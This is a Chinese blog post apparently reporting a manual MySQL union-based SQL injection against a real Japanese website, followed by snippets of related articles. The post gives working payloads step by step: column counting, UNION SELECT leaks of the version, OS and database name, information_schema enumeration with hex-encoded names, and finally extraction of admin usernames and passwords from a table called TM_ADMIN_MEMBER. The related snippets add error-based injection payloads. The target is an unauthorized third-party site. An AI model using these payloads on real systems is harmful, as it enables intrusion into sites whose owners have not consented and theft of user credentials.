mysql报错注入实战_MySQL手工注入实战

最新推荐文章于 2023-02-02 22:56:32 发布
最新推荐文章于 2023-02-02 22:56:32 发布
阅读量166 收藏
点赞数
文章标签: mysql报错注入实战
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34972980/article/details/113610633
版权

实战记录,日本某站

注入点 and 语句测试

and1=1 返回正常,and=2跳回首页,可能过滤了

70425592e6b505b1937d510ed97bfec8.png

6e5a01b790b05d1bc68942b2769db505.png

用 ’ 测试返回错误页面

判断为注入点

42250c813127ed9a41b1602062eb580e.png

order by语句查询字段数

fa46133ce6b7a15fd6b885d9e1ab9b65.png

8b5db3095c5678a4a262eac9eb08b469.png

测试字段数为9

05593fa7f21f897851d7d85e2de29bde.png

and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9

报错联合查询语句,查询显示位

2、3为显示位

bd4879a0c81c12b2f35e7e85937b096d.png

使用注入函数可爆出数据库版本信息

c84b5778b9ee541034607f64849ed1ff.png

and 1=2 UNION SELECT 1,@@version_compile_os,3,4,5,6,7,8,9

注入函数@@version_compile_os爆出操作系统

b7faebb11fbd6123b5348cc30d2dbc9d.png

and 1=2 UNION SELECT 1,database(),3,4,5,6,7,8,9

用注入函数database()爆出当前库

ed16116874ac3470aa5f7aa0919d2ba4.png

Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息

and1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8,9 from information_schema.SCHEMATA limit 0,1

c7c0fae0641a66b9c4cd54d54da31c70.png

库1

爆出第二个数据库,limit1,1即可

发现第二个数据库就是当前库

1bc111ae271e322f72a20f1ee82804c6.png

库2

and 1=2 union select 1,TABLE_NAME,3,4,5,6,7,8,9from information_schema.TABLES whereTABLE_SCHEMA=(库2名字16进制)limit 0,1

爆第一个表名,数据库名要转换为16进制

f961ca3730cb4f87bbc1ac4d3b27cd73.png

表1 敏感表

改为limit 1,1可爆第二个表名

a42c53b12bb6fdf8e0ddd30584f5029e.png

表2

and 1=2 union select 1,group_concat(TABLE_NAME),3,4,5,6,7,8,9 from information_schema.TABLES where TABLE_SCHEMA=0x68656E65636961 limit 0,1

使用group_concat(table_name)可以一次爆出全部表名

d0d84553e9cad7b281dd7aacf88cf8e6.png

已得到敏感表名TM_ADMIN_MEMBER,接下来爆字段

表名要转换为16进制

and 1=2 union select

1,COLUMN_NAME,3,4,5,6,7,8,9 from

information_schema.COLUMNSwhere TABLE_NAME= limit 0,1

ccfdeb6684b6534567cdf4010f2a98b9.png

推荐使用这种方法

and 1=2 union select 1,group_concat(COLUMN_NAME),3,4,5,6,7,8,9 from information_schema.COLUMNS where TABLE_NAME= limit 0,1

#COLUMN  翻译为  列

用 group_concat(COLUMN_NAME)函数可以一次爆出全部字段

或者可以修改limit 1,1、limit 2,1.......来一个一个爆出

68dbd785841e97197af55fa34b39c3dc.png

敏感字段

有敏感表名,敏感字段名后就获取内容

经测试login_uid字段存放的是用户名

login_pwd存放的是密码

and 1=2 union select 1,login_uid,login_pwd,4,5,6,7,8,9 from 表名

30ee52900d7c274ccba7b372a257041b.png

接下来的自行脑补.......ca21afcec72d75337ba4bbea62fb9b05.gif

欢迎各位大神指点批评!

晨风

Ff枫
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
《WEB安全渗透测试》(3)SQL注入实战报错注入
午夜安全
10-02 1006
《WEB安全渗透测试》(3)SQL注入实战报错注入 1)考虑使用报错注入URL:http://www.tianchi.com/web/error.php?username=1URL:http://www.tianchi.com/web/error.php?username=1'由于多了一个',SQL语句执行时会报错。而这里程序直接将错误信息输出到了页面上,所以可以利用报错注入来获取数据。2)获取user()的值报错注入有多种格式,这里使用updatexml()函数,......
mysql报错注入实战_手工注入——MySQL手工注入实战和分析
weixin_39746382的博客
01-18 98
今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场。话不多说,咱们直接开始。第一步,判断注入点通过 ' 和构造 and 1=1 和 and 1=2 查看页面是否报错。这里通过and 1=1 发现页面正常。如下图。接下来,咱们再构造 and 1=2 发现页面报错,说明页面存在注入点。如下图。第二步,判断字段数通过 order by 语句,如果后面输入的...
mysql报错注入实战_MySQL 报错注入原理分析以及运用
weixin_42513448的博客
02-28 203
0x00 前言之前在做sqli-labs 第五第六题的时候是利用盲注来进行做的 中途操作过程非常繁杂每个信息都要使用脚本来进行拆解 就算我用python编了相应的脚本 仍然感觉麻烦 所以昨天再去看了看 好像题目的本意不是让我们用盲注的方法来实现的 题目是想让我们使用报错注入 (双查询注入)来进行获取数据库的一些信息0x01 原理分析首先需要知道的一些知识为什么叫做报错注入 原因就是我们是通过反馈出...
mysql报错注入实战_十种MySQL报错注入
weixin_35377249的博客
02-02 104
以下均摘自《代码审计:企业级Web代码安全架构》一书1.floor()select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);2.extractvalue()selec...
MySQL五种报错注入1
08-04
MySQL五种报错注入是一种利用数据库的错误反馈信息来获取敏感数据的技术,通常在网站存在SQL注入漏洞时被攻击者利用。以下将详细介绍这些方法: 1. **数据库版本暴露** 利用`information_schema.tables`系统表和`...
Mysql报错注入详解.docx
11-20
MySQL 报错注入是一种安全漏洞利用技术,当应用程序在处理用户输入时未能充分过滤或转义SQL语句,导致数据库因错误语法而返回错误信息,攻击者可以通过分析这些错误信息来获取敏感信息或执行恶意操作。以下是对MySQL...
PHP、mysql手工注入
10-12
- **转义特殊字符**:使用函数如`mysql_real_escape_string`或`htmlspecialchars`来转义可能导致注入的字符。 - **最小权限原则**:数据库连接应使用只具有执行所需权限的低权限账户。 - **避免在SQL中拼接字符串...
PHP+Mysql注入攻防实战.pdf
04-22
### PHP+Mysql注入攻防实战 #### SQL注入攻击概述 SQL注入是一种常见的网络攻击手法,攻击者通过向Web应用程序的输入字段注入恶意SQL代码,迫使应用执行非预期的SQL命令,从而获取敏感数据、篡改数据库内容或控制...
PHP+MySQL 手工注入语句大全 推荐
10-29
标题中提到的“PHP+MySQL手工注入语句大全推荐”以及描述中提到的“PHP MYSQL手工注射”的知识点主要包括了如何利用SQL注入技术在PHP开发的网站中,通过MySQL数据库的漏洞来获取敏感信息或控制系统。由于这些操作在...
mysql注入实战攻击视频
08-10
具体介绍了mysql注入实战攻击的方法,讲解详细,很适合菜鸟
Mysql注入实战
weixin_43821278的博客
07-14 192
mysql注入实战】-报错注入与布尔盲注报错注入布尔盲注 请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。未经过授权,禁止非法测试。 报错注入 靶场如图。没有验证码防止爆破。打开burp,试试有没有SQL注入。 burp抓包如下: 居然有错误回显,那没得说了。直接上sqlmap,但是没有成功。不知道为什么,显示404 not found好吧。那就借助burp半自动好了。 查看用户user(),database(),version() refurl=&us
mysql高级报错注入_mysql新型报错注入实例
weixin_39913807的博客
02-08 131
使用DVWA的第一关作为例子讲解一下mysql的新型注入。第一关链接:http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1&Submit=%C8%B7%B6%A8# ,参数id存在注入http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1’&Submit=%C8%B7%B6%A...
mysql日本_MYSQL手工注入某日本网站
weixin_39934257的博客
01-19 423
作者:ice 团队:www.anying.org 转载必须注明。E-mail:1c30day@gmail.com经过一天的辛苦劳动下班了,实在无聊,QQ上的基友基本都挂机睡觉了。找点乐子打发时间,看了一下2013年OWASP Top Ten Project, Injection排在第一。去了解注入,还是有必要的。随便google了几个日本网站,发现不少都在注入点,有很多用手工都比较鸡肋,终于找...
MySQL注入实战
jerryF01的博客
09-03 387
第1步、访问靶场 靶场地址:http://219.153.49.228:41377 第2步、 1、查找 观察页面,查找单页面之处: 2、页面提交: http://219.153.49.228:41377/new_list.php?id=1 and 1=2 3、返回结果 返回内容为空 4、数据库查询: select * from news where id =1 and 1=2 5、解析: 因为...
[MYSQL手工注入](3)基于报错的SQL注入实战
baguangman5501的博客
07-17 195
0x03 MYSQL 手工注入实战——基于错误的 SQL 注入 今天如愿以偿的找到了基于错误的SQL注入环境了:是一个国外卖音响的小网站,还在建设中: 看一下报错信息: (1)确定闭合语句:从上面的报错信息来看,这里应该是不需要闭合即可注入 (2)order by 查询字段数: (3)确定数据可显位置: (4)先来一句素质三连(数据库名、用户名、数据库版本): (5)查询当...
【SQL注入漏洞-03】报错注入靶场实战
cc
02-02 6347
注入点的判断过程中,发现数据库中SQL语句的报错信息,会显示在页面中,因此可以进行报错注入 报错注入的原理:就是在错误信息中执行SQL语句。触发报错的方式很多,具体细节也不尽相同。报错注入有可能成功,也有可能不成功!可以多刷新几次
sql报错注入实例
xy_259的博客
01-14 478
题目地址 bugku 多次 http://123.206.87.240:9004/ 本地有两个部分,第一关的界面如下, 加上单引号出现报错,再加上23%可以显示正常的界面,发现过滤了很多的字符,在这里用异或(^)的方式检查过滤了哪些字符, 异或:当同时为真或者假的时候为假 然后就可以构造payload;来测试过滤了哪些字符 因为length(‘or’)!=0 为真,所以应该会报错,而此时没...
SQL注入实战报错注入篇(updatexml extractvalue floor)
qq_41272376的博客
03-03 1402
SQL注入实战报错注入篇(updatexml extractvalue floor) 知识铺垫 在上一篇中我们在漏洞页面中进行了SQL注入实战之联合查询,这篇文章带来的是SQL注入报错注入篇。 首先我们来细分一下SQL注入分类 SQL注入分类: 回显正常—> 联合查询 union select 回显报错—> Duplicate entry() extractvalue()    updatexml() 盲注 —>布尔型盲注 基于时间的盲注sleep()
vue使用mysql报错ERR_CONNECTION_REFUSED
最新发布
04-09
当使用Vue连接MySQL时,出现ERR_CONNECTION_REFUSED错误通常是由于以下几个原因导致的: 1. MySQL服务器未启动:请确保你的MySQL服务器已经正确启动。你可以通过检查MySQL服务状态或者尝试重新启动MySQL来解决此...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值